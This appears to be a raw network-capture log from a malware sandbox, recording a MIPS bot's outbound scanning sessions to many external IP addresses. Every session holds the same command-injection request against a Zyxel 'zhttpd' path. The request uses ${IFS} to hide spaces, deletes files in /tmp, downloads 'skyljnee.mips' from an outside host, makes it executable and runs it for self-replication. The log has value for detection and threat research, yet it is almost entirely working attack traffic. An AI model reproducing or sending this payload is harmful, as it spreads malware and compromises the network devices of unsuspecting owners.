                                                Jan 28, 2024 10:16:13.634939909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1429192.168.2.2336732182.252.206.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634955883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1430192.168.2.2338018186.247.133.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634965897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1431192.168.2.235256473.238.153.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.634988070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1432192.168.2.2348816175.173.157.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.635049105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1433192.168.2.235546480.194.139.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.635066032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1434192.168.2.234432652.229.123.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.635085106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1435192.168.2.2341092115.123.109.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.635133028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1436192.168.2.2333446112.174.40.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.635149002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1437192.168.2.234526018.74.77.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.635169029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1438192.168.2.2338962213.123.54.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.635215998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1439192.168.2.235266620.209.59.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.635216951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1440192.168.2.2340174145.187.119.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.635260105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1441192.168.2.233590871.30.140.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.635281086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1442192.168.2.2353024202.185.93.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.635310888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1443192.168.2.235162888.179.86.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.635348082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1444192.168.2.233922660.166.82.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.635371923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1445192.168.2.2355820208.44.72.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.635413885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1446192.168.2.2337784131.130.10.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.635446072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1447192.168.2.236035088.85.92.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.635479927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1448192.168.2.2339730120.18.223.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.635499954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1449192.168.2.2356366135.195.167.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.635665894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1450192.168.2.235142685.203.171.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.635685921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1451192.168.2.235075636.251.238.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.635700941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1452192.168.2.2345918184.216.126.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.635727882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1453192.168.2.233533669.77.246.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.635757923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1454192.168.2.2356806217.75.161.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.635809898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1455192.168.2.2345456194.198.45.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.635844946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1456192.168.2.234509231.11.157.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.635869980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1457192.168.2.2358814158.250.57.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.635879040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1458192.168.2.2338006113.234.186.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.635907888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1459192.168.2.2343942205.64.238.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.635953903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1460192.168.2.2346848154.20.70.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.635957956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1461192.168.2.2334074182.133.244.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.635983944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1462192.168.2.2340072166.96.68.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636015892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1463192.168.2.2351708212.121.212.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636070013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1464192.168.2.235377275.172.171.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636070013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1465192.168.2.2350848110.130.110.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636086941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1466192.168.2.234267877.245.119.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636111021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1467192.168.2.2359646114.243.235.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636143923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1468192.168.2.2347428181.77.53.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636190891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1469192.168.2.234274634.73.60.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636209965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1470192.168.2.2355468110.223.193.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636231899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1471192.168.2.23413588.184.185.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636244059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1472192.168.2.2343770192.128.204.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636284113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1473192.168.2.235457278.81.106.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636291981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1474192.168.2.235290081.247.84.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636351109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1475192.168.2.2350098131.41.129.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636375904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1476192.168.2.233734085.211.80.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636384010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1477192.168.2.2336692118.74.77.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636403084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1478192.168.2.23546709.198.235.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636420012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1479192.168.2.2356218121.185.46.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636468887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1480192.168.2.234988080.80.176.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636502981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1481192.168.2.234150681.67.2.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636512995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1482192.168.2.2352474123.107.202.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636543989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1483192.168.2.235007460.51.223.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636579037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1484192.168.2.235433273.62.196.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636590958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1485192.168.2.2352104220.193.48.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636626005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1486192.168.2.2337978133.175.125.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636655092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1487192.168.2.234975040.27.125.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636691093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1488192.168.2.2335666175.72.189.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636723995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1489192.168.2.235874295.26.108.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.636749983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1490192.168.2.2346614136.120.93.186443
                                                TimestampBytes transferredDirectionData
